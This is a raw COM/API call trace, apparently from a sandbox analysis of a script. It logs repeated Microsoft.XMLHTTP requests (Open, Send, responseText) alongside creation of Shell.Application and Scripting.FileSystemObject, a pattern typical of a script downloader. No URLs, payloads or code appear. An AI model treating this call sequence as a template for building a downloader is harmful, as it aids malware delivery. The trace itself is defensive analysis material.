	[0331.530] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0331.530] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0331.530] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c10) returned 0x0
	[0331.530] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0331.531] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0331.531] ??2@YAPEAX_K@Z () returned 0x62f330
	[0331.531] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f330) 
	[0331.531] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0331.531] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0331.531] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c10) returned 0x0
	[0331.531] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c10) returned 0x3
	[0331.531] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0331.531] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0331.531] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0331.531] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0331.531] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0331.531] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0331.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0331.823] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0331.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0331.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0331.823] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0331.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0331.823] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0331.824] SysStringLen (param_1=0x0) returned 0x0
	[0331.824] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0331.824] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0331.824] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0331.824] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0331.824] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0331.824] ??2@YAPEAX_K@Z () returned 0x62f350
	[0331.824] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0331.824] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0331.824] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0331.824] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0331.824] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0331.824] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0331.824] SysStringLen (param_1=0x0) returned 0x0
	[0331.824] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0331.827] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0331.827] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0331.827] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0331.827] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0331.827] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0331.827] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0332.803] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0332.803] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0332.803] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0332.805] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0332.805] SysStringLen (param_1=0x0) returned 0x0
	[0332.805] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0332.805] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0332.805] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c10) returned 0x0
	[0332.805] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0332.805] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0332.805] ??2@YAPEAX_K@Z () returned 0x62f330
	[0332.805] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0332.805] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0332.806] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0332.806] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c10) returned 0x0
	[0332.806] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c10) returned 0x3
	[0332.806] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0332.806] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c10, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0332.808] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c10, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0332.808] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0332.808] SysStringLen (param_1=0x0) returned 0x0
	[0332.808] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0332.808] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0332.808] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0332.808] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0332.808] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0332.808] ??2@YAPEAX_K@Z () returned 0x62f310
	[0332.808] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0332.808] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0332.808] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0332.808] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0332.809] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0332.809] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0332.809] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0332.809] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0332.809] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0332.809] SysStringLen (param_1=0x0) returned 0x0
	[0332.809] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0332.812] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0332.812] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c70) returned 0x0
	[0332.812] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0332.812] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0332.812] ??2@YAPEAX_K@Z () returned 0x62f330
	[0332.812] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0332.812] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0332.812] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0332.812] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c70) returned 0x0
	[0332.812] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c70) returned 0x3
	[0332.812] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0332.812] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c70, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0332.813] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0332.813] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0332.813] SysStringLen (param_1=0x0) returned 0x0
